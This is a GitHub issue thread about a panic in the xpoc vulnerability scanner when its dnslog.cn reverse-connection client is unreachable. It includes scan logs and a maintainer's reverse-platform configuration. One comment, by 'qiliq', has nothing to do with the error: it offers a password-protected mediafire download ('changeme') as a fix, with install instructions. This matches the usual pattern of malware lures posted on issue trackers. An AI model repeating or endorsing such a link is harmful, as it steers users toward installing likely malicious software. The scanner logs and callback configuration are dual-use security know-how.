### ISSUE TITLE
执行报错"panic interface conversion"失败

### ISSUE THREAD

**Issue by HugoWw** [chaitin/xpoc#43]
本地环境：
Ubuntu 22.04 LTS

执行工具报错：
$./xpoc -t http://xxxx -o result.html
```
[INF] 24-08-28 15:25:45 poc:reverse-client-dnslog: DNSLOG.CN不可用 原因: Get "http://dnslog.cn/getdomain.php": dial tcp: lookup dnslog.cn: i/o timeout [dnslogcn.go:39]
[INF] 24-08-28 15:25:45 poc:reverse-client-new: 新反连客户端不可用 原因: 没有开启新反连平台 [client.go:18]
GET http://192.168.3.210
[WRN] 24-08-28 15:25:45 poc:poc-go-yonyou-u8-cloud-servicedispatcherservlet-rce: no vulnerability: request error [value.go:596]
[INF] 24-08-28 15:25:55 [1] website: [200 OK] http://testphp.vulnweb.com
[ERR] 24-08-28 15:25:55 poc:reverse-client-dnslog: panic: interface conversion: reverse.ClientIface is nil, not *reverse.DNSLogCNClient [dnslogcn.go:31]
[INF] 24-08-28 15:25:55 poc:reverse-registry: 反连 CLIENT 没有按照预期等待 [registry.go:147]
[INF] 24-08-28 15:25:55 poc:reverse-registry: 将默认等待 5 秒后退出 [registry.go:148]
```

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HugoWw** [comment]
dns error

**Comment by 4ra1n** [comment]
dial tcp: lookup dnslog.cn: i/o timeout 看起来没有连通 dnslog.cn

可以加入参数 --disable reverse-client-dnslog 禁用 dnslog.cn

**Comment by ikelvinwoo** [comment]
> dial tcp: lookup dnslog.cn: i/o timeout 看起来没有连通 dnslog.cn
> 
> 可以加入参数 --disable reverse-client-dnslog 禁用 dnslog.cn

看起来好像还是不行诶，还是一样的问题

**Comment by 4ra1n** [comment]
什么问题，还是报错 dial tcp dnslog.cn 错误吗

我测试加了  --disable reverse-client-dnslog 后不会报错

你需要配置 xray 的老反连使它生效

```yaml
reverse-registry:
        # ↱DNS服务器: 和 HTTP服务URL 类似，实际用来访问 dns 服务器的地址
        dns_server_ip: ""
        # ↱DNS域名: 用来指定 dns 服务器地址所绑定的域名
        domain: ""
        # ↱HTTP服务URL: 该地址是存在漏洞的目标反连回来的地址, 当反连平台前面有反代、绑定域名、端口映射时需要自行配置；该URL会直接用于payload填充，需保证被扫描目标能够正常访问该URL
        http_base_url: ""
        # ↱DNS服务是否为反连平台自身: 如果是反连平台，任何可以触发解析的行为都可以证明漏洞存在，而不需要再指定 DNS
        is_domain_name_server: false
        # ↱LDAP服务URL: 和 HTTP服务URL 类似，实际用来访问 ldap 服务的地址
        ldap_server_addr: ""
        # ↱反连平台管理端URL: 用于拉取反连平台被触发的信息 如果为空则使用 HTTP服务URL； 需要保证扫描器端能正常访问
        reverse_server_url: ""
        # ↱RMI服务URL: 和 HTTP服务URL 类似，实际用来访问 rmi 服务的地址
        rmi_server_addr: ""
        # ↱通信Token: 用于盲打平台通信认证
        token: ""
        # ↱反连等待时间: 任务结束时等待多久退出
        wait_timeout: 5s
```
